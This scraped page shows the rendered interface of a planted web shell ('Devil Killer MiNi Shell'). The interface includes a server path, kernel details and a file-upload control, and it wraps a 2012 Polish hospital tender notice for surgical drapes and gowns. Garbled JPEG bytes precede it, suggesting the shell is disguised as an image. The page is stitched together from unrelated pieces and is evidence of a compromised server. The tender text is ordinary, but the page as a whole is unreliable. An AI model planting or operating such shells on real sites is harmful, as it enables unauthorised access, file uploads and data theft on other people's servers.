JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120904/190425-N-2012.html

<p class="kh_header"><b>Lubartów: Dostawy obłożeń i serwet operacyjnych</b><br>
<b>Numer ogłoszenia: 190425 - 2012; data zamieszczenia: 04.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul.  Cicha 14, 21-100 Lubartów, woj. lubelskie, tel. 81 855 66 08, faks 81 855 66 08.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy obłożeń i serwet operacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia stanowią dostwy opatrunków i innych materiałów medycznych w ilościach i asortymencie określonym w Załączniku nr 1 do SIWZ (Zadanie Nr 1 i Nr 2).
2. Wspólny Słownik Zamówień (CPV) : 33-14-00-00-3
3. Dopuszcza się składanie ofert częściowych.
4. Nie dopuszcza się składania ofert równoważnych.
5. Termin przydatności do użycia nie krótszy niż  24  miesięce, licząc od daty   dostarczenia towaru do Zamawiającego.
6. W celu oceny jakości dostarczanych wyrobów Zamawiający wymaga złożenia próbek, w ilościach wskazanych poniżej (dostarczone próbki nie podlegają zwrotowi) :

Zadanie Nr 1
L.p.
Nazwa wyrobu
Charakterystyka
Ilość próbek
1
Zestaw serwet uniwersalnych
Sterylny zestaw serwet uniwersalnych wykonanych z minimum dwuwarstwowej na całej powierzchni chłonnego i mocnego nieprzemakalnego laminatu. Gramatura serwet bez wzmocnień minimum 55g-cm2 
1 serweta na stolik narzędziowy 140 x 190 cm (wzmocnienie 75 x 190 cm) 1 obłożenie stolika Mayo złożone teleskopowo 80 x 145 cm (wzmocnienie 60 x 80 cm) 1 samoprzylepna serweta operacyjna 150 x 240 cm 1 samoprzylepna serweta operacyjna 170 x 175 cm 2 samoprzylepne serwety operacyjne 75 x 90 cm 1 taśma samoprzylepna 10 x 50 cm 4 ręczniki celulozowe 33 x 33 cm
1 szt. 

2
Zestaw serwet uniwersalnych wzmocnionych
Sterylny zestaw serwet uniwersalnych wykonanych z minimum dwuwarstwowej na całej powierzchni chłonnego i mocnego nieprzemakalnego laminatu. Gramatura serwet bez wzmocnień minimum 55g-cm2, a w obszarach wzmocnionych 110g-cm2
1 serweta na stolik narzędziowy 140 x 190 cm (wzmocnienie 75 x 190 cm)
1 obłożenie stolika Mayo złożone teleskopowo 80 x 145 cm (wzmocnienie 60 x 80 cm), 1 samoprzylepna serweta operacyjna 150 x 240 cm (wzmocnienie 50 x 75 cm),  1 samoprzylepna serweta operacyjna 200 x 175 cm (wzmocnienie 50 x 75 cm), 2 samoprzylepne serwety operacyjne 75 x 90 cm (wzmocnienie 45 x 60 cm)
1 taśma samoprzylepna 10 x 50 cm,  4 ręczniki celulozowe 33 x 33 cm
1 szt. 

3
Fartuch chirurgiczny
Sterylny fartuch chirurgiczny, pełnobarierowy z włókniny polipropylenowej, nieprzemakalne wstawki w przedniej części i w rękawach. Szwy wykonane metodą ultradźwięków. Rękawy zakończone mankietami bawełnianymi lub poliestrowymi. Troki łączone kartonikiem. Kolor niebieski. Fartuch pakowany dodatkowo w papier krepowy, Wewnątrz opakowania dwa ręczniki. Rozmiar L.
1 szt. 

4
Fartuch chirurgiczny
Sterylny fartuch chirurgiczny, pełnobarierowy z włókniny polipropylenowej, nieprzemakalne wstawki w przedniej części i w rękawach. Szwy wykonane metodą ultradźwięków. Rękawy zakończone mankietami bawełnianymi lub poliestrowymi. Troki łączone kartonikiem. Kolor niebieski. Fartuch pakowany dodatkowo w papier krepowy, Wewnątrz opakowania dwa ręczniki. Rozmiar XXL
1 szt. 

5
Fartuch chirurgiczny
Sterylny fartuch chirurgiczny, pełnobarierowy z włókniny polipropylenowej, nieprzemakalne wstawki w przedniej części i w rękawach. Szwy wykonane metodą ultradźwięków. Rękawy zakończone mankietami bawełnianymi lub poliestrowymi. Troki łączone kartonikiem. Kolor niebieski. Fartuch pakowany dodatkowo w papier krepowy, Wewnątrz opakowania dwa ręczniki. Rozmiar XL
1 szt. 

6
Serweta operacyjna
Sterylna serweta operacyjna wykonana z dwuwarstwowego nieprzemakalnego materiału z chłonną warstwą zewnętrzną. Dłuższy brzeg wykończony taśmą samoprzylepną o właściwościach hypoalergicznych. Rozmiar 75x 90cm (+-5cm)
1 szt. 

7
Ścierka sterylna
Ściereczka sterylna do osuszania rąk po umyciu chirurgicznym, wykonana z wielowarstwowej bibuły celulozowej. Pakowana pojedynczo o wymiarach mim 30-33cmx33-40cm
1 szt. 

8
Zestaw serwet wzmocnionych do chirurgii dłoni-stopy
Sterylny zestaw serwet uniwersalnych wykonanych z minimum dwuwarstwowej na całej powierzchni chłonnego i mocnego nieprzemakalnego laminatu. Gramatura serwet bez wzmocnień minimum 55g-cm2, a w obszarach wzmocnionych 110g-cm2
2 serwety na stolik narzędziowy 140 x 190 cm (wzmocnienie 75 x 190 cm)
1 obłożenie stolika Mayo złożone teleskopowo 80 x 145 cm (wzmocnienie 60 x 80 cm)
1 serweta do zabiegów chirurgicznych dłoni-stopy 320 x 225 cm, średnica 3 cm (wzmocnienie 150 x 150 cm), 2 ręczniki celulozowe 33 x 33 cm
1 szt. 


Zadanie Nr 2
L.p.
Nazwa wyrobu
Charakterystyka
Ilość próbek
1
OBŁOŻENIE  DO OPERACJI STAWU BIODROWEGO
Sterylne obłożenie do operacji stawu biodrowego  wykonane z chłonnego mocnego minimum dwuwarstwowego na całej powierzchni nieprzemakalnego laminatu. Minimalny skład zestawu: -serweta o wymiarach min 200x290cm  z wycięciem w kształcie litery U ok.9x100cm, otoczonym taśmą samoprzylepną -1szt
-serweta o wymiarach min 150x240cm służąca jako ekran anestezjologiczny -1szt
-osłona na stolik Mayo (folia w kolorze czerwonym) -1szt
-kieszeń dwukomorowa na ssak i koagulację -1szt
-pokrowiec na kończynę wykonany z nieprzemakalnego laminatu o wym.ok.37x105cm -1szt
-taśmy lepne min10x50cm -3szt
-ściereczki chłonne -2szt
-serweta na stolik instrumentariuszki 150x200cm -1szt
Tolerancja w rozmiarach serwet +- 10cm
1 szt.

2
OBŁOŻENIE  DO ARTROSKOPII KOLANA
Sterylne obłożenie do artroskopii kolana  wykonane z chłonnego mocnego minimum dwuwarstwowego na całej powierzchni nieprzemakalnego laminatu. Minimalny skład zestawu: -serweta o wymiarach min 220x320cm  wyposażona w warstwę chłonną i płat lateksowy  z otworem 9cm
-osłona na kończynę o wym. ok.37x75cm -1szt
-taśma lepna min 10x50cm -2szt
-ściereczki chłonne -2szt
-serweta na stolik instrumentariuszki o wymiarze min 150x 180cm -1szt
Tolerancja w rozmiarach serwet +-10cm
1 szt.

3
Sterylna serweta do zabiegu cesarskiego cięcia o wymiarach 180x300cm, wykonana z minimum dwuwarstwowego na całej powierzchni, chłonnego mocnego i nieprzemakalnego laminatu. W części centralnej serwety znajduje się otwór trapezowy o wymiarach podstaw 20 i 30cm i wysokości 20cm wypełniony folią chirurgiczną. Otwór ten okleja worek z usztywnionym brzegiem przechwytujący płyny. Worek posiada zawór do podłączenia drenu. Całość owinięta w serwetę 100x150cm, która może służyć jako przykrycie stolika.
Tolerancja w rozmiarach serwet +-10cm
10 szt.
4
POKROWIEC NA PRZEWODY 
Pokrowiec na przewody. Sterylny pokrowiec foliowy na przewody, teleskopowo złożony z taśmami do mocowania na końcówkach. Rozmiar 18x240cm (min.)
10 szt.
5

FARTUCH CHIRURGICZNY
Sterylny fartuch endoskopowy jednorazowego użytku, wykonany w części przedniej i rękawach z nieprzemakalnego materiału (laminat), w części tylnej z włókniny, szeroki, umożliwiający zabezpieczenie kończyn dolnych przed zamoczeniem, również w pozycji siedzącej, wiązany na troki, rozmiar L
1 szt.
6
Czepek włókninowy chirurgiczny,  z wstawką pochłaniającą pot na całej długości czepka. Tylna część ściągnięta delikatnie, nieuciskająca bezlateksową gumką
Pakowany w kartoniku w formie podajnika.
1 szt.
7
Fartuch higieniczny dla pacjenta, wykonany z włókniny polipropylenowej o zwiększonej gramaturze (nieprzezroczysty) zwiększony obwód oraz poszerzone krótkie rękawy, długie rozcięcie z przodu ułatwia czynności zabiegowe.
1 szt.
8
ZESTAW DO ZABIEGÓW NEUROCHIRURGICZNYCH Serweta chirurgiczna do kraniotomii o wymiarach 230x290 cm,posiada otwór wypełniony folią chirurgiczną o wymiarach 30x20 cm ,dwa zintegrowane organizatory przewodów z możliwością regulacji otworu,worek do  przechwytywania płynów, wyposażony w sito i podłączenie do drenu-1szt,serwety chirurgiczne z taśmą samoprzylepną o wym 50x50cm-4szt, taśma samoprzylepna o wym. 9x49cm-1szt, ręczniki chłonne o wym 18x25cm-2szt, osłona na stolik MAYO 79x145cm-1szt, serweta na stolik (owinięcie zestawu)o wym 150x190cm-1szt.

1 szt.
9
OBŁOŻRNIE DO OPERACJI BARKU-Sterylne obłożenie do operacji stawu barkowego wykonane z chłonnego mocnego dwuwarstwowego na całej powierzchni nieprzemakalnego laminatu. Skład zestawu: serweta chirurgiczna górna o wymiarach 200x150cm, z wycięciem U o wymiarach 50x10cm z taśmą samoprzylepną, serweta chirurgiczna dolna z taśmą samoprzylepną o wymiarach 220x180cm ,osłona na kończynę o wym.37x75cm,taśmy samoprzylepne o wtm.9x49cm-2szt, ręczniki chłonne o wym. 30x40cm-2szt,osłona na stolik MAYO o wym.79x145cm-1szt, serweta na stolik o wym.150x180 (owinięcie zestawu)-1szt.

1 szt.
10
OBŁOŻRNIE DO OPERACJI GINEKOLOGICZNYCH-Sterylne obłożenie do operacji ginekologicznych wykonane z chłonnego mocnego dwuwarstwowego na całej powierzchni nieprzemakalnego laminatu. Skład zestawu: serweta chirurgiczna do zabiegów ginekologicznych o wym.150x235cm, zintegrowana z ekranem anestezjologicznym i nogawicami, posiada otwór w okolicy krocza, którego rozmiar i kształt można regulować za pomocą zintegrowanych taśm samoprzylrpnych.Otwór otacza warstwa chłonna-1szt, serweta chirurgiczna samoprzylepna o wym. 50x50cm 1szt, serwety chirurgiczne o wym. 75x90cm. 2szt, taśmy samoprzylepne o wym. 9x49cm 2szt, ręczniki chłonne o wym.18x25cm 4szt, serweta na stolik (owinięcie zestawu) o wym. 150x190cm 1szt.

1 szt.
11
ZESTAW SERWET UNIWERSALNYCH
Sterylny zestaw serwet uniwersalnych wykonany z minimum dwuwarstwowego na całej powierzchni chłonnego, mocnego i nieprzemakalnego laminatu.
Skład zestawu:
1.Serweta górna z taśmą samoprzylepną - ekran anestezjologiczny 240x150cm -1szt
2. Serwety boczne z taśmą samoprzylepną 90 x 75 - 2 szt                  
3. Serweta dolna z taśmą samoprzylepną 175 x175 cm - 1 szt. 
4.Taśma samoprzylepna 9 x 49 - 1 szt
5. Ręczniki chłonne -  18 x 25cm 4 szt.  
6.Osłona na stolik Mayo - 79x145cm 1 szt.                                                            
7. Serweta na stolik (owinięcie zestawu) - 150 x 90cm - 1 szt.
1 szt.

Próbki winny znajdować się w oddzielnym opakowaniu niż oferta . 
Paczka z próbkami winna być oznaczona: Próbki do przetargu nieograniczonego na dostawy obłożeń i serwet operacyjnych Nr sprawy: SZP-25-2012
Wewnątrz należy umieścić informacje o nazwie i adresie Wykonawcy oraz informację, których zadań próbki dotyczą. 
Próbki  należy złożyć  w Sekretariacie SP ZOZ w Lubartowie  ul. Cicha 14  21-100 Lubartów do dnia 14.09.2012 r. godz. 10.00..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy i doświadczenia  na 	podstawie przedstawionego wykazu zrealizowanych w ciągu ostatnich trzech lat (a jeśli okres 	prowadzenia działalności jest krótszy - w tym okresie) dwóch dostaw obłożeń i serwet 	operacyjnych  na kwotę: dla Zadania Nr 1 - min. 40.000 zł brutto, dla Zadania Nr 2 - min. 	130.000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Oświadczenie Wykonawcy, że zaoferowane wyroby medyczne dopuszczone są do obrotu w Polsce zgodnie z ustawą z 20.05.2010 r. o wyrobach medycznych (Dz,U. Nr 107 poz 679).
2.Foldery, katalogi zawierające szczegółowy opis przedmiotu zamówienia w języku polskim z zaznaczeniem pozycji , której dotyczą.
3.Karta techniczna wyrobu.
4.Do oferty należy dołączyć próbki określone w dziale III pkt 6 SIWZ (w oddzielnym opakowaniu).</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące przesłanki do zmiany warunków zawartej umowy:
1.W przypadku zmiany stawki podatku VAT w trakcie trwania umowy dopuszcza się zmianę wartości umowy o różnicę wynikającą ze zmiany wartości podatku VAT. Taka zmiana może nastąpić po zaakceptowaniu przez Zamawiającego wniosku Wykonawcy zawierającego uzasadnienie faktyczne i prawne.
2.W przypadku zmiany technologii produkcji lub w przypadku zaistnienia innych okoliczności pozwalających na obniżenie ceny przedmiotu umowy, Wykonawca odpowiednio ją obniży.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz-lubartow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie, ul. Cicha 14, 21-100 Lubartów, Sekcja Zamówień Publicznych i Zaopatrzenia, pokój nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2012 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie, ul. Cicha 14, 21-100 Lubartów, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com